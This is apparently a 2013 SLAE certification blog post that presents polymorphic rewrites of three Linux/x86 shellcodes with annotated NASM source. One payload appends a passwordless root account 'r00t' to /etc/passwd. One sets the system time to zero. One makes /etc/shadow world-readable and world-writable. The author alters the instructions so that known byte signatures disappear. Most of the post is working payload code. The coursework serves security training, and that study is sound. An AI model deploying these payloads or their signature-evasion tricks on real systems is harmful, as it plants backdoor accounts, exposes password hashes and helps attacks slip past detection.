SLAE Assignment 6: Creating polymorphic versions of existing Shellcode

06 May 2013

This is the sixth and, for me, final SLAE assignment before I hand in everything (and hopefully get certified). The assignment consisted of generating polymorphic versions of shellcode found on shell-storm.org. I took three examples: the first adds a root account to /etc/passwd, the second sets the system time to 0, and the third changes the permissions of /etc/shadow.

Information

Github Repository: https://github.com/cloud101/SLAE32/ This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-251

r00t

The original assembly code: the first shellcode appends a uid 0 user 'r00t' with an empty password field to /etc/passwd.

; By Kris Katterjohn 11/14/2006
; 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd for Linux/x86
;
; NASM syntax, 32-bit Linux, syscalls via int 0x80 (eax = number, args in ebx/ecx/edx).
; Appends the line "r00t::0:0:::" to /etc/passwd: a uid 0 / gid 0 account whose
; password, gecos, home and shell fields are all empty.  Needs write access to
; /etc/passwd (i.e. must already run as root); no return value is checked.
; Every instruction is chosen so the encoded bytes contain no 0x00.
  section .text
       global _start
  _start:
  ; open("/etc//passwd", O_WRONLY | O_APPEND)
       push byte 5                ; eax = __NR_open (push/pop sets all 32 bits, no 0x00 byte)
       pop eax
       xor ecx, ecx
       push ecx                   ; NUL terminator for the path
       push 0x64777373            ; "sswd"
       push 0x61702f2f            ; "//pa"  (the doubled slash pads the path to three full dwords)
       push 0x6374652f            ; "/etc"  -> esp points at "/etc//passwd\0"
       mov ebx, esp               ; arg0: pathname
       mov cx, 02001Q             ; arg1: octal 02001 = 0x401 = O_WRONLY|O_APPEND (high half of ecx is 0)
       int 0x80
       mov ebx, eax               ; fd from open (-errno on failure, not checked)
  ; write(ebx, "r00t::0:0:::", 12)
       push byte 4                ; eax = __NR_write
       pop eax
       xor edx, edx
       push edx                   ; NUL terminator (not part of the 12 bytes written)
       push 0x3a3a3a30            ; "0:::"
       push 0x3a303a3a            ; "::0:"
       push 0x74303072            ; "r00t"  -> esp points at "r00t::0:0:::"
       mov ecx, esp               ; arg1: buf
       push byte 12
       pop edx                    ; arg2: count = 12
       int 0x80
  ; close(ebx)
       push byte 6                ; eax = __NR_close
       pop eax
       int 0x80
  ; exit()
       push byte 1                ; eax = __NR_exit; the status is whatever ebx holds (the fd)
       pop eax
       int 0x80

My version:

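; By Lucas Kauffman
; 100 byte shellcode to add root user 'r00t' with no password to /etc/passwd for Linux/x86
;
; Original by Kris Katterjohn 11/14/2006
;
; NASM syntax, 32-bit Linux, int 0x80 syscalls (eax = number, args in ebx/ecx/edx).
; Same behaviour as the original (open /etc//passwd with O_WRONLY|O_APPEND, append
; "r00t::0:0:::", close, exit) with different instruction encodings; still no 0x00
; bytes, still 100 bytes.  Two constants of the first revision were wrong and are
; fixed here: the open flags were written as decimal 401 (= 0x191, which has no
; O_APPEND, so the write would overwrite the first 12 bytes of /etc/passwd instead
; of appending), and the add-immediates for the first two string dwords produced
; "1111" (0x31313131) instead of "0:::" and "::0:".
  section .text
       global _start
  _start:
  ; open("/etc//passwd", O_WRONLY | O_APPEND)
       xor ebx,ebx                  ; ebx = 0; the mul below then zeroes eax and edx too
       mul ebx                      ; edx:eax = eax * 0 = 0
       mov al,5                     ; eax = __NR_open (safe here: eax was fully zeroed)
       mov ecx,ebx                  ; ecx = 0
       push ecx                     ; NUL terminator for the path
       mov dword [esp-4], 0x64777373 ; "sswd"  stored below esp, esp is moved down afterwards
       mov dword [esp-8], 0x61702f2f ; "//pa"  (32-bit Linux has no red zone: a signal delivered
       mov dword [esp-12],0x6374652f ; "/etc"  before the sub could clobber these 12 bytes)
       sub esp,12                   ; esp -> "/etc//passwd\0"
       mov ebx, esp                 ; arg0: pathname
       mov cx, 0x401                ; arg1: O_WRONLY|O_APPEND (was decimal 401 = 0x191: wrong flags)
       int 0x80
       mov ebx, eax                 ; fd (not checked; on failure eax/ebx hold -errno)
  ; write(ebx, "r00t::0:0:::", 12)
       mov al,4                     ; eax = __NR_write; assumes fd < 256 so the upper 24 bits of eax are 0
       push edx                     ; edx is still 0 from mul: NUL terminator
       mov esi, 0x20202020          ; each dword is built as base + delta so the literal
       add esi, 0x1a1a1a10          ; string bytes never appear in the code: "0:::" = 0x3a3a3a30
       push esi
       mov esi, 0x20202020
       add esi, 0x1a101a1a          ; "::0:" = 0x3a303a3a
       push esi
       mov esi, 0x63202061
       add esi, 0x11101011          ; "r00t" = 0x74303072
       push esi                     ; esp -> "r00t::0:0:::\0"
       mov ecx, esp                 ; arg1: buf
       push byte 12
       pop edx                      ; arg2: count = 12
       int 0x80
  ; close(ebx)
       mov al,6                     ; eax = __NR_close (write returned 12, upper bytes already 0)
       int 0x80
  ; exit()
       mov al,1                     ; eax = __NR_exit (close returned 0)
       int 0x80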

My code is 100 bytes versus the original 69 bytes, an increase of 31 bytes (roughly 45%).

Time

This shellcode sets the system time to 0 and is 12 bytes long. I changed my version only minimally and did not manage to make it any shorter; it just changes the bytes (first the original, then my version):

; By Kris Katterjohn 11/18/2006
;  12 byte shellcode to set system time to 0 and exit. No real damage :)
;  exit() is the last 3 bytes (0x40 0xcd 0x80 = inc eax / int 0x80); the
;  "last 5 bytes (0x6a - 0x80)" wording belongs to the push/pop exit() variant
;  for Linux/x86
;
; NASM syntax, 32-bit Linux, int 0x80.  Calls stime(&t) with t = 0 (the epoch).
; NOTE(review): changing the clock presumably needs root / CAP_SYS_TIME; the
; return value is not checked either way.  No 0x00 bytes.
  section .text
       global _start
  _start:
  ; stime([0])
       push byte 25               ; eax = __NR_stime (push/pop sets the whole register)
       pop eax
       cdq                        ; edx = sign-extension of eax = 0 (1-byte way to zero edx)
       push edx                   ; the time_t value 0 lives on the stack
       mov ebx, esp               ; arg0: pointer to that 0
       int 0x80                   ; result (0 or -errno) ignored
  ; exit()
       inc eax                    ; eax = 1 = __NR_exit, relying on stime having returned 0
       int 0x80
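  ; Polymorphic variant of the stime shellcode above: still 12 bytes, still no
  ; 0x00 bytes, same syscalls.  Only the encodings differ: "push byte 25 / pop eax"
  ; became "mov al,25" and "inc eax" became "inc al".  Caveat: unlike push/pop,
  ; "mov al,25" leaves the upper 24 bits of eax untouched, so this only works where
  ; eax is already 0 when the code starts (true at _start of a fresh process, not
  ; guaranteed for injected code).  The first revision was missing the ';' before
  ; the inline comment on "inc al" and did not assemble.
  section .text
       global _start
  _start:
  ; stime([0])
       mov al,25                  ; eax = __NR_stime (assumes eax's upper bytes are already 0)
       cdq                        ; edx = 0 (sign-extension of the small positive eax)
       push edx                   ; time_t 0 on the stack
       mov ebx, esp               ; arg0: &t
       int 0x80                   ; return value not checked
  ; exit()
       inc al                     ; eax = 1 = __NR_exit if stime returned 0 (was "inc eax")
       int 0x80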

It's a bit lame I know ;)

Chmod of /etc/shadow

Last but not least, a shellcode which changes the file permissions of /etc/shadow to 0666, making the password hashes readable and writable by every local user:

; By Kris Katterjohn 8/29/2006
;  36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86
;  To remove exit(): Remove the last 5 bytes (0x6a - 0x80)
;
; NASM syntax, 32-bit Linux, int 0x80.  Makes the shadow file world-readable and
; world-writable; needs the privilege to chmod /etc/shadow (normally root).
; No 0x00 bytes; the return value of chmod is not checked.
  section .text
       global _start
  _start:
       xor edx, edx
       push byte 15               ; eax = __NR_chmod
       pop eax
       push edx                   ; extra NUL padding after the path
       push byte 0x77             ; pushed as the dword 0x00000077: "w" plus three NULs that terminate the string
       push word 0x6f64           ; "do"
       push 0x6168732f            ; "/sha"
       push 0x6374652f            ; "/etc"  -> esp points at "/etc/shadow\0"
       mov ebx, esp               ; arg0: pathname
       push word 0666Q            ; arg1: mode 0666 (= 0x1b6) pushed as 2 bytes ...
       pop ecx                    ; ... popped as 4: the high word picks up "/e" from the string.
                                  ; Presumably harmless because only the low 16 bits are used as
                                  ; the mode, and ebx already holds the path pointer.
       int 0x80
       push byte 1                ; eax = __NR_exit  (these 5 bytes: 6a 01 58 cd 80)
       pop eax
       int 0x80

Polymorphic version, which is 5 bytes longer (41 versus 36 bytes):

  ; Polymorphic variant: 41 bytes (5 more than the original), same syscalls and
  ; the same "/etc/shadow" path, but "do" is built at runtime as 0x4d42 + 0x2222
  ; so the literal 0x6f64 never appears in the code, and the push/pop pairs became
  ; "mov al,N".  No 0x00 bytes.  Caveat: "mov al,15" only sets the low byte, so it
  ; relies on eax already being 0 at entry (true at _start of a fresh process, not
  ; guaranteed when injected); the original's push/pop has no such dependency.
  section .text
       global _start
  _start:
       xor ecx, ecx
       mov al,15   ; changed push pop to mov: eax = __NR_chmod only if eax's upper bytes were 0
       push ecx                   ; NUL padding after the path
       push byte 0x77             ; dword 0x00000077: "w" plus the terminating NULs
       mov cx,0x4d42 ; random addition before pushing: cx = 0x4d42 + 0x2222 = 0x6f64 = "do"
       add cx,0x2222
       push cx
       push 0x6168732f            ; "/sha"
       push 0x6374652f            ; "/etc"  -> esp points at "/etc/shadow\0"
       mov ebx, esp               ; arg0: pathname
       push word 0x1b6            ; arg1: mode 0x1b6 = 0666, pushed as 2 bytes ...
       pop ecx                    ; ... popped as 4; the junk high word ("/e") is presumably
                                  ; ignored since only the low 16 bits act as the mode
       int 0x80
       mov al,1  ; changed push pop to mov: eax = __NR_exit if chmod returned 0 (on -errno this is not exit)
       int 0x80

For this one I also made an additional version which is 2 bytes shorter than the original (34 versus 36 bytes; each push/pop pair replaced by a 2-byte mov al,N saves one byte):

  ; Shorter variant: 34 bytes (2 fewer than the original).  Identical layout and
  ; syscalls; the two "push byte N / pop eax" pairs became "mov al,N" and the mode
  ; is written in hex instead of octal (same value 0x1b6 = 0666).  No 0x00 bytes.
  ; Caveat: "mov al,15" relies on eax already being 0 at entry (true at _start of
  ; a fresh process, not guaranteed for injected code).
  section .text
       global _start
  _start:
       xor edx, edx
       mov al,15  ; changed push pop to mov: eax = __NR_chmod only if eax's upper bytes were 0
       push edx                   ; NUL padding after the path
       push byte 0x77             ; dword 0x00000077: "w" plus the terminating NULs
       push word 0x6f64           ; "do"
       push 0x6168732f            ; "/sha"
       push 0x6374652f            ; "/etc"  -> esp points at "/etc/shadow\0"
       mov ebx, esp               ; arg0: pathname
       push word 0x1b6 ; changed octal to hex: mode 0666, pushed as 2 bytes ...
       pop ecx                    ; ... popped as 4; the junk high word is presumably ignored
                                  ; since only the low 16 bits act as the mode
       int 0x80
       mov al,1  ; changed push pop to mov: eax = __NR_exit if chmod returned 0 (on -errno this is not exit)
       int 0x80